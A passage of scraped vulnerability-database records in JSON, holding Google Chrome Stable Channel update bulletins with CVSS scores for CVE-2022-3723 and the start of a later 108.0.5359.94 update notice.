\n\n\n\nGoogle is aware of reports that an exploit for CVE-2022-3723 exists in the wild.\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\nInterested in switching release channels? Find out how [here](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://support.google.com/chrome/community>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\n\n\n\nPrudhvikumar Bommana \n\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-27T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-27T00:00:00", "id": "GCSA-272405271979539515", "href": "https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T20:11:38", "description": "The Stable channel has been updated to 108.0.5359.94 for Mac and Linux and 108.0.5359.94/.95 for Windows, which will roll out over the coming days/weeks. A full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/108.0.5359.71..108.0.5359.94?pretty=fuller&n=10000>).\n\n\n\n\nThe Extended Stable channel has been updated to 108.0.5359.94 for Windows and Mac which will roll out over the coming days/weeks. \n\n Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven&#x27;t yet fixed.\n\n\n\n\nThis update includes [1](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M108>) security fix. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\